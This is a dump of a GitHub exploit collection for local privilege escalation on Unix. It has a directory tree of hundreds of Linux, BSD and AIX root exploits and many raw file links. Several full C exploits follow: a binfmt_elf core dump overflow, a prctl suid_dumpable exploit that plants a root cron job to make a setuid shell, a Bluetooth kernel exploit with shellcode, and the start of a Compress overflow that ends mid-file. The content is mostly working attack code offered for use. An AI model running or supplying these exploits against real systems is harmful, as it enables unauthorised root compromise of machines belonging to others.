├── 2001 ├── 2k └── hudo.c ├── 2002 ├── 3b └── 4m ├── 2003 ├── 2-4-21 ├── 2.4.22-2003 ├── 48local ├── elflbl ├── hatorihanzo.c └── ptrace-kmod.c ├── 2004 ├── 2.6.13_17_0_2004 ├── elfcd.sh ├── kernel.c ├── mremap_pte.c └── pwned ├── 2005 ├── 2.6.13_17_2_2005 ├── 2.6.27.7- 2.6.18 2.6.24 ├── binfmt_elf.c ├── ex_gpsd.c ├── expand_stack-SMP-race.c ├── k-rad.c ├── k-rad3 ├── krad ├── krad2 └── ong_bak.c ├── 2006 ├── 2618 ├── 2.4.21-2006 ├── 2.6.13_17_3_2006 ├── 2.6.18 - 2.6.25 ├── 2.6.18-8 ├── 2.6.18.1 ├── 2.6.9-42.0.3.ELsmp ├── 2.6.x_logrotate_2031 ├── ecl-nf-snmpwn.c ├── m2 ├── prct1 ├── prct2.c ├── prct3 2.6.13.c ├── prct4 └── prct6 2.6.x.c ├── 2007 ├── 2.6.11-2007-priv8 ├── 2.6.17-2.6.24.1 ├── 2.6.18.2 ├── 2.6.22-24-2007 ├── 2.6.9-55-2007 ├── compress ├── compress_expl.c ├── gawk ├── gawk_expl.c └── w00t.so.1.0 ├── 2008 ├── 16 ├── 2008 ├── 1-2008 ├── 2.4.36.92.6.27.5 - 2008 Local root ├── 2.6.17-18-19-20-24 ├── 2.6.18-164 ├── 2.6.22 ├── 2.6.22-4-686 2008 ├── 2.6.23 ├── 2.6.23-2.6.24.c ├── 2.6.23=2008 ├── 2.6.9-67-2008 ├── 2008-4210 ├── 2008-4210.c └── CVE-2008-0009.c ├── 2009 ├── 2.4.AnD.2.6-2009 ├── 2.6.17.c ├── 2.6.18-128 ├── 2.6.18-2009.c ├── 2.6.23-2009.c ├── 2.6.28-2009.c ├── 2.6.29.c ├── 2.6.29.sh ├── 2.6.r1z.sh ├── 2009-proto_ops │ ├── exploit.c │ ├── run.c │ └── run.sh ├── 2009.6.18-164 ├── 2009.6.31_2009 ├── CVE-2009-0360 │ ├── CVE-2009-0360 │ └── CVE-2009-0360.c ├── CVE-2009-1046.c ├── CVE-2009-1185.c ├── CVE-2009-1337.sh ├── CVE-2009-1527.c ├── CVE-2009-1894 │ └── pulseaudio-exp │ │ ├── c.sh │ │ ├── config.h │ │ ├── info.txt │ │ ├── pulseaudio-exp.c │ │ └── shell.c ├── CVE-2009-2692 │ ├── 2.6.18.c │ └── CVE-2009-2692.c ├── CVE-2009-2698 │ ├── CVE-2009-2698.c │ ├── hoagie_udp_sendmsg.c │ ├── katon.c │ └── therebel │ │ ├── exploit.c │ │ ├── pwnkernel.c │ │ └── therebel.sh ├── CVE-2009-2908.c ├── CVE-2009-3547 │ ├── gayros-2.c │ └── gayros.c ├── iskorpitx ├── linux-sendpage3 │ ├── exploit-pulseaudio.c │ ├── exploit.c │ ├── run │ ├── runcon-mmap_zero │ └── sesearch-mmap_zero ├── r00t ├── rad-e.c └── wunderbar_emporium2 │ ├── exploit.c │ ├── exploit.so │ ├── pwnkernel │ ├── pwnkernel.c │ └── wunderbar_emporium.sh ├── 2010 ├── 2010 ├── 2.6.18 2010 ├── 2.6.18-194 2010 x86_64 ├── 2.6.18 │ ├── 15065.c │ ├── 2.6.18-194.1-2010 │ └── 2.6.18-194.17.1.el5 ├── 2.6.27 and up │ └── 2.6.27.c ├── 2.6.2x │ └── devilzc0de.cpp ├── 2.6.31-2010.c ├── 2.6.31 │ └── 2.6.31-2010.c ├── 2.6.32.c ├── 2.6.32 │ ├── 2.6.32-2010 │ └── 2.6.32-2010.c ├── 2.6.36-rc1 and down │ ├── compile2 │ ├── i-CAN-haz-MODHARDEN │ └── i-CAN-haz-MODHARDEN.c ├── 2.6.36.2 and down │ ├── 2.6.36.2 │ └── 2.6.36.2.c ├── 2.6.37 and down │ ├── full-nelson │ └── full-nelson.c ├── 2.6.xx ├── CVE-2010-0832.sh ├── CVE-2010-1146 │ └── CVE-2010-1146.py ├── CVE-2010-2961.sh ├── CVE-2010-3081 │ ├── 2010-3081.c │ └── ABftw.c ├── CVE-2010-3301 │ ├── 15023 │ └── 15023.c ├── CVE-2010-3437 │ ├── 15150 │ └── 15150.c ├── CVE-2010-3847.sh ├── CVE-2010-3856 │ ├── CVE-2010-3856.sh │ ├── DSO_libmemusage.sh │ ├── glibc_libmemusage.so.sh │ ├── glibc_libpcprofile.so.sh │ ├── glibc_nondebian.sh │ ├── libmemusage.sh │ ├── libpcprofile.sh │ ├── raptor_ldaudit.sh │ └── raptor_ldaudit2.sh ├── CVE-2010-3904 │ ├── 15285 │ ├── 15285.c │ ├── linux-rds-exploit │ └── linux-rds-exploit.c ├── CVE-2010-4077, 2.6.37 │ └── CVE-2010-4077.c ├── CVE-2010-4170.sh ├── CVE-2010-4347 │ ├── american-sign-language │ └── american-sign-language.c ├── abi.c ├── ia32syscall └── x86_84.c ├── 2011 ├── 2.6.18-274 │ └── 2.6.18-274-2011 ├── 2.6.18-6-x86 │ └── 2.6.18-6-x86-2011 ├── 2.6.18.c ├── 2.6.18_2011.c ├── 2.6.28 and down │ └── alpha-omega.c ├── 2.6.28 │ └── 2.6.28-2011 ├── 2.6.32-46 │ └── 2-6-32-46-2011 ├── 2.6.33 │ └── 2.6.33-2011 ├── 2.6.34 and up │ ├── caps-to-root.c │ └── caps-to-root2.c ├── 2.6.34 │ ├── 2.6.34-2011 │ └── 2.6.34-2011Exploit2 ├── 2.6.37-rc2.c ├── 3.0.c ├── 6.4-2011 ├── CVE-2011-1485 │ ├── 17942.c │ ├── CVE-2011-1485.sh │ └── polkit-pwnage.c ├── CVE-2011-2777.sh ├── CVE-2011-4124 │ ├── cali.sh │ ├── calib.sh │ ├── calibe.sh │ ├── caliber.sh │ └── shadow ├── CVE-2012-0809 │ ├── death-star │ └── death-star.c └── z1d-2011 ├── 2012 ├── 3 ├── 4 ├── 5 ├── 7 ├── 8 ├── 9 ├── 10 ├── 11 ├── 14 ├── 18 ├── 31 ├── 44 ├── 89 ├── 99 ├── 15150 ├── 15200 ├── 0977 ├── 13x ├── 16-1 ├── 18-5 ├── 2-1 ├── 2-6-37 ├── 2.6.17_2.6.24 ├── 2.6.18-2.6.24-2.6.20-2.6.22-2.6.21.c ├── 2.6.18-374.12.1.el5-2012 ├── 2.6.18.1 ├── 2.6.18 │ ├── v1-2.6.18.2012.c │ └── v2-2.6.18-238.c ├── 2.6.32.279..2012.out ├── 2.6.33 ├── 2.6.37 ├── 2.6.37-rc2 ├── 2.6.39 and up │ ├── mempodipper │ └── mempodipper.c ├── 36-rc1 ├── 7-2 ├── 7x ├── CVE-2012-0946 │ ├── 2012-0946.c │ └── CVE-2012-0946 ├── CVE-2012-3524 │ ├── dd │ ├── dd.c │ ├── dzug │ └── dzug.c ├── a.out ├── acid ├── exp1 ├── exploit ├── full-nelson ├── gayros ├── krad313 ├── local-root-exploit-gayros ├── pwnkernel ├── root1 ├── runx ├── tivoli ├── ubuntu └── vmsplice-local-root-exploit ├── 2013 ├── 2.6.17.4_2013 ├── 2.6.18 ├── 2.6.32-2013 ├── 2.6.32-46.1.BHsmp ├── 2.6.37 to 3.x.x │ ├── perf_ptmx.c │ └── semtex.c ├── 3.3 to 3.7 │ ├── archer │ └── archer.c ├── 3.6,3.8.9-2013.c ├── 3.8.0 │ ├── clown-newuser.c │ └── userns_root_exploit.c ├── 3.8.9 and down │ ├── perf_swevent_init │ └── perf_swevent_init.c ├── CVE-2013-1763.c ├── CVE-2013-2094-Ubuntu-12.c └── enlightenment │ ├── exp_abacus.c │ ├── exp_cheddarbay.c │ ├── exp_framework.h │ ├── exp_ingom0wnar.c │ ├── exp_moosecox.c │ ├── exp_paokara.c │ ├── exp_powerglove.c │ ├── exp_sieve.c │ ├── exp_therebel.c │ ├── exp_vmware.c │ ├── exp_wunderbar.c │ ├── exploit.c │ ├── funny.jpg │ ├── pwnkernel.c │ ├── run_nonnull_exploits.sh │ └── run_null_exploits.sh ├── 2014 ├── 1-2 ├── 2.6.18.371 2014.c ├── 3.15-rc4 and down │ └── CVE-2014-0196.c ├── 3.4 and up │ ├── recvmmsg │ ├── recvmmsg.c │ ├── timeoutpwn │ └── timeoutpwn.c ├── 3.4+.c ├── CVE-2014-3153.c ├── CVE-2014-4014-setgid.c ├── CVE-2014-4699.c ├── CVE-2014-5284.py ├── ekit │ ├── include │ │ └── hdr.txt │ ├── ret2dir │ │ ├── kernwrite_amd64 │ │ ├── kernwrite_amd64-pax │ │ ├── kernwrite_amd64.c │ │ ├── perf-events_amd64 │ │ ├── perf-events_amd64.c │ │ ├── rds_amd64-pax │ │ ├── rds_amd64.c │ │ ├── shellcode.h │ │ ├── sock-diag_amd64 │ │ └── sock-diag_amd64.c │ ├── ret2usr │ │ ├── kernwrite_amd64 │ │ ├── kernwrite_amd64.c │ │ ├── perf-events_amd64 │ │ ├── perf-events_amd64.c │ │ ├── rds_amd64 │ │ ├── rds_amd64.c │ │ ├── shellcode.h │ │ ├── sock-diag_amd64 │ │ └── sock-diag_amd64.c │ ├── runme │ └── utils │ │ ├── kernwrite-pax │ │ ├── Makefile │ │ ├── Module.symvers │ │ ├── VERSION │ │ ├── kernwrite.c │ │ ├── kernwrite.ko │ │ ├── kernwrite.mod.c │ │ ├── kernwrite.mod.o │ │ ├── kernwrite.o │ │ └── modules.order │ │ ├── kernwrite │ │ ├── Makefile │ │ ├── Module.symvers │ │ ├── VERSION │ │ ├── kernwrite.c │ │ ├── kernwrite.ko │ │ ├── kernwrite.mod.c │ │ ├── kernwrite.mod.o │ │ ├── kernwrite.o │ │ └── modules.order │ │ └── load_kernwrite.c ├── local.c └── seccomp-exp │ ├── Makefile │ ├── hu.c │ └── seccomp-bpf.h ├── BSD ├── 2005 │ └── FreeBSDmaster.passwd.c ├── 2008 │ ├── CVE-2008-5736 .c │ ├── CVE-2008-5736.c │ └── cve-2008-3531.c ├── 2009 │ ├── 2009-3527.c │ ├── 2009-4146.sh │ └── FreeBSD_7.2.c ├── 2010 │ ├── 2010-2020 │ │ ├── nfs_mount_ex │ │ └── nfs_mount_ex.c │ ├── 2010-4210.c │ └── CVE-2010-2693 │ │ ├── 14688.c │ │ └── cve-2010-2693.c ├── 2011 │ ├── 2011-4062.sh │ ├── 2011-4862.c │ ├── 8.1 │ │ └── bsd.pl │ ├── CVE-2011-4062 │ │ ├── memvisor.tgz │ │ └── sploit.tgz │ └── CVE-2011-4122.sh ├── 2012 │ └── CVE-2012-0217 (FreeBSD 8.3 - 9.0 amd64 privesc ) │ │ ├── 22222.c │ │ └── CVE-2012-0217.c └── 2013 │ ├── 9.0-9.1 │ ├── cve-2013-2171 │ └── cve-2013-2171.c │ └── 9.0 │ ├── 9.0 │ └── FreeBSD_9.0.c ├── IBM_AIX └── 2013 │ └── aix-r00t.sh └── README.md /2001/2k: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2001/2k -------------------------------------------------------------------------------- /2002/3b: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2002/3b -------------------------------------------------------------------------------- /2002/4m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2002/4m -------------------------------------------------------------------------------- /2003/2-4-21: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/2-4-21 -------------------------------------------------------------------------------- /2003/2.4.22-2003: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/2.4.22-2003 -------------------------------------------------------------------------------- /2003/48local: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/48local -------------------------------------------------------------------------------- /2003/elflbl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/elflbl -------------------------------------------------------------------------------- /2004/2.6.13_17_0_2004: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2004/2.6.13_17_0_2004 -------------------------------------------------------------------------------- /2004/pwned: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2004/pwned -------------------------------------------------------------------------------- /2005/2.6.13_17_2_2005: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/2.6.13_17_2_2005 -------------------------------------------------------------------------------- /2005/2.6.27.7- 2.6.18 2.6.24: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/2.6.27.7- 2.6.18 2.6.24 -------------------------------------------------------------------------------- /2005/binfmt_elf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux binfmt_elf core dump buffer overflow 3 | * 4 | * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. 5 | * 6 | * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" 7 | * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 8 | * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 9 | * 10 | */ 11 | // phase 1 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include 21 | 22 | 23 | static char *env[10], *argv[4]; 24 | static char page[PAGE_SIZE]; 25 | static char buf[PAGE_SIZE]; 26 | 27 | 28 | void fatal(const char *msg) 29 | { 30 | if(!errno) { 31 | fprintf(stderr, "\nFATAL: %s\n", msg); 32 | } 33 | else { 34 | printf("\n"); 35 | perror(msg); 36 | } 37 | fflush(stdout); fflush(stderr); 38 | _exit(129); 39 | } 40 | 41 | 42 | int main(int ac, char **av) 43 | { 44 | int esp, i, r; 45 | struct rlimit rl; 46 | 47 | __asm__("movl %%esp, %0" : : "m"(esp)); 48 | printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], 49 | av[ac-1]+strlen(av[ac-1]), esp); 50 | rl.rlim_cur = RLIM_INFINITY; 51 | rl.rlim_max = RLIM_INFINITY; 52 | r = setrlimit(RLIMIT_CORE, &rl); 53 | if(r) fatal("setrlimit"); 54 | 55 | memset(env, 0, sizeof(env) ); 56 | memset(argv, 0, sizeof(argv) ); 57 | memset(page, 'A', sizeof(page) ); 58 | page[PAGE_SIZE-1]=0; 59 | 60 | // move up env & exec phase 2 61 | if(!strcmp(av[0], "AAAA")) { 62 | printf("\n[+] phase 2, to crash "); fflush(stdout); 63 | argv[0] = "elfcd2"; 64 | argv[1] = page; 65 | 66 | // term 0 counts! 67 | memset(buf, 0, sizeof(buf) ); 68 | for(i=0; i<789 + 4; i++) 69 | buf[i] = 'C'; 70 | argv[2] = buf; 71 | execve(argv[0], argv, env); 72 | _exit(127); 73 | } 74 | 75 | // move down env & reexec 76 | for(i=0; i<9; i++) 77 | env[i] = page; 78 | 79 | argv[0] = "AAAA"; 80 | printf("\n[+] phase 1"); fflush(stdout); 81 | execve(av[0], argv, env); 82 | 83 | return 0; 84 | } -------------------------------------------------------------------------------- /2005/k-rad3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/k-rad3 -------------------------------------------------------------------------------- /2005/krad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/krad -------------------------------------------------------------------------------- /2005/krad2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/krad2 -------------------------------------------------------------------------------- /2006/2.4.21-2006: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.4.21-2006 -------------------------------------------------------------------------------- /2006/2.6.13_17_3_2006: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.13_17_3_2006 -------------------------------------------------------------------------------- /2006/2.6.18 - 2.6.25: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.18 - 2.6.25 -------------------------------------------------------------------------------- /2006/2.6.18-8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.18-8 -------------------------------------------------------------------------------- /2006/2.6.18.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.18.1 -------------------------------------------------------------------------------- /2006/2.6.9-42.0.3.ELsmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.9-42.0.3.ELsmp -------------------------------------------------------------------------------- /2006/2.6.x_logrotate_2031: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.x_logrotate_2031 -------------------------------------------------------------------------------- /2006/2618: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2618 -------------------------------------------------------------------------------- /2006/m2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/m2 -------------------------------------------------------------------------------- /2006/prct1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/prct1 -------------------------------------------------------------------------------- /2006/prct3 2.6.13.c: -------------------------------------------------------------------------------- 1 | /* Linux >= 2.6.13 prctl kernel exploit 2 | * 3 | * (C) Julien TINNES 4 | * 5 | * If you read the Changelog from 2.6.13 you've probably seen: 6 | * [PATCH] setuid core dump 7 | * 8 | * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, 9 | * user setable argument to PR_SET_DUMPABLE. 10 | * 11 | * This flaw allows us to create a root owned coredump into any directory. 12 | * This is trivially exploitable. 13 | * 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | 27 | #define CROND "/etc/cron.d" 28 | #define BUFSIZE 2048 29 | 30 | 31 | struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; 32 | 33 | char crontemplate[]= 34 | "#/etc/cron.d/core suid_dumpable exploit\n" 35 | "SHELL=/bin/sh\n" 36 | "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" 37 | "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; 38 | 39 | char cronstring[BUFSIZE]; 40 | char fname[BUFSIZE]; 41 | 42 | struct timeval te; 43 | 44 | void sh(int sn) { 45 | execl(fname, fname, (char *) NULL); 46 | } 47 | 48 | 49 | int main(int argc, char *argv[]) { 50 | 51 | int nw, pid; 52 | 53 | if (geteuid() == 0) { 54 | printf("[+] getting root shell\n"); 55 | setuid(0); 56 | setgid(0); 57 | if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { 58 | perror("[-] execle"); 59 | return 1; 60 | } 61 | } 62 | 63 | printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); 64 | 65 | /* get our file name */ 66 | if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { 67 | perror("[-] readlink"); 68 | printf("This is not fatal, rewrite the exploit\n"); 69 | } 70 | 71 | if (signal(SIGUSR1, sh) == SIG_ERR) { 72 | perror("[-] signal"); 73 | return 1; 74 | } 75 | printf("[+] Installed signal handler\n"); 76 | 77 | /* Let us create core files */ 78 | setrlimit(RLIMIT_CORE, &myrlimit); 79 | if (chdir(CROND) == -1) { 80 | perror("[-] chdir"); 81 | return 1; 82 | } 83 | 84 | /* exploit the flaw */ 85 | if (prctl(PR_SET_DUMPABLE, 2) == -1) { 86 | perror("[-] prtctl"); 87 | printf("Is you kernel version >= 2.6.13 ?\n"); 88 | return 1; 89 | } 90 | 91 | printf("[+] We are suidsafe dumpable!\n"); 92 | 93 | /* Forge the string for our core dump */ 94 | nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); 95 | if (nw >= sizeof(cronstring)) { 96 | printf("[-] cronstring is too small\n"); 97 | return 1; 98 | } 99 | printf("[+] Malicious string forged\n"); 100 | 101 | if ((pid=fork()) == -1) { 102 | perror("[-] fork"); 103 | return 1; 104 | } 105 | 106 | if (pid == 0) { 107 | /* This is not the good way to do it ;) */ 108 | sleep(120); 109 | exit(0); 110 | } 111 | 112 | /* SEGFAULT the child */ 113 | printf("[+] Segfaulting child\n"); 114 | if (kill(pid, 11) == -1) { 115 | perror("[-] kill"); 116 | return 1; 117 | } 118 | if (gettimeofday(&te, NULL) == 0) 119 | printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); 120 | sleep(120); 121 | 122 | printf("[-] It looks like the exploit failed\n"); 123 | 124 | return 1; 125 | } 126 | 127 | // milw0rm.com [2006-07-12] 128 | 129 | -------------------------------------------------------------------------------- /2006/prct4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/prct4 -------------------------------------------------------------------------------- /2007/2.6.11-2007-priv8: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 12 | #define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff 13 | #define KERNEL_SPACE_BUFFER 0x100000 14 | 15 | 16 | char asmcode[] = /*Global shellcode*/ 17 | 18 | "\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" 19 | "\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" 20 | "\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" 21 | "\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; 22 | 23 | 24 | 25 | struct net_proto_family { 26 | int family; 27 | int (*create) (int *sock, int protocol); 28 | short authentication; 29 | short encryption; 30 | short encrypt_net; 31 | int *owner; 32 | }; 33 | 34 | 35 | int check_zombie_child(int status,pid_t pid) 36 | { 37 | waitpid(pid,&status,0); 38 | if(WIFEXITED(status)) 39 | { 40 | if(WEXITSTATUS(status) != 0xFF) 41 | exit(-1); 42 | } 43 | else if (WIFSIGNALED(status)) 44 | { 45 | printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status))); 46 | return(WTERMSIG(status)); 47 | } 48 | } 49 | 50 | 51 | int brute_socket_create (int negative_proto_number) 52 | { 53 | socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ 54 | int i; 55 | i = geteuid(); 56 | printf("Checking the Effective user id after overflow : UID = %d\n",i); 57 | if(i) 58 | exit(EXIT_FAILURE); 59 | printf("0wnage D0ne bro.\n"); 60 | execl("/bin/sh","sh",NULL); 61 | exit(EXIT_SUCCESS); 62 | } 63 | 64 | 65 | int main(void) 66 | { 67 | 68 | pid_t pid; 69 | int counter; 70 | int status; 71 | int *kernel_return; 72 | 73 | char kernel_buffer[KERNEL_SPACE_BUFFER]; 74 | unsigned int brute_start; 75 | unsigned int where_kernel; 76 | 77 | struct net_proto_family *bluetooth; 78 | 79 | bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); 80 | bzero(bluetooth,sizeof(struct net_proto_family)); 81 | 82 | bluetooth->family = AF_BLUETOOTH; 83 | bluetooth->authentication = 0x0; /* No Authentication */ 84 | bluetooth->encryption = 0x0; /* No Encryption */ 85 | bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ 86 | bluetooth->owner = 0x0; /* No fucking owner */ 87 | bluetooth->create = (int *) asmcode; 88 | 89 | 90 | 91 | kernel_return = (int *) kernel_buffer; 92 | 93 | for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) 94 | *kernel_return = (int)bluetooth; 95 | 96 | brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; 97 | printf("Bluetooth stack local root exploit\n"); 98 | printf("http://backdoored/net"); 99 | 100 | while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END ) 101 | { 102 | where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; 103 | where_kernel = -where_kernel; 104 | 105 | pid = fork(); 106 | if(pid == 0 ) 107 | brute_socket_create(where_kernel); 108 | check_zombie_child(status,pid); 109 | brute_start += KERNEL_SPACE_BUFFER; 110 | fflush(stdout); 111 | } 112 | return 0; 113 | } -------------------------------------------------------------------------------- /2007/2.6.17-2.6.24.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.17-2.6.24.1 -------------------------------------------------------------------------------- /2007/2.6.18.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.18.2 -------------------------------------------------------------------------------- /2007/2.6.22-24-2007: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.22-24-2007 -------------------------------------------------------------------------------- /2007/2.6.9-55-2007: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.9-55-2007 -------------------------------------------------------------------------------- /2007/compress: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/compress -------------------------------------------------------------------------------- /2007/compress_expl.c: -------------------------------------------------------------------------------- 1 | /* Compress v4.2.4 local test exploit */ 2 | /* */ 3 | /* Yields no extra privileges. For more information please read */ 4 | /* our advisory. */ 5 | /* */ 6 | /* (C) NETRIC SECURITY TEAM - 2002 */ 7 | 8 | #include 9 | #include 10 | 11 | #define NOP 0x90 12 | #define BSIZE 1032 // Replace for 1173 when using SuSE 13 | #define EGGSIZE 2048 14 | 15 | char *shellcode = 16 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 17 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 18 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 19 | 20 | 21 | int main(int argc, char **argv) { 22 | char *buffer, *pointer, *egg; 23 | int bsize = BSIZE, c, offset = 0; 24 | long addr, *addr_pointer; 25 | int get_sp = (int)&get_sp; 26 | 27 | if (argc > 1) offset = atoi(argv[1]); 28 | if (argc > 2) bsize = atoi(argv[2]); 29 | 30 | if(!(buffer = malloc(bsize))) { 31 | fprintf(stderr, "Memory not allocated!\n"); 32 | exit(1); 33 | } 34 | 35 | if(!(egg = malloc(EGGSIZE))) { 36 | fprintf(stderr, "Memory not allocated!\n"); 37 | exit(1); 38 | } 39 | 40 | 41 | addr = get_sp + offset; 42 | pointer = buffer; 43 | addr_pointer = (long *) pointer; 44 | 45 | printf("-> Compress 4.2.4 local exploit\n"); 46 | printf("Using return adress: 0x%x\n", addr); 47 | printf("Buffersize: %d\n", bsize); 48 | printf("Offset: %d\n", offset); 49 | 50 | for(c = 0; c < bsize; c+=4) 51 | *(addr_pointer++) = addr; 52 | 53 | pointer = egg; 54 | 55 | for(c = 0; c < EGGSIZE - strlen(shellcode) -1; c++) 56 | 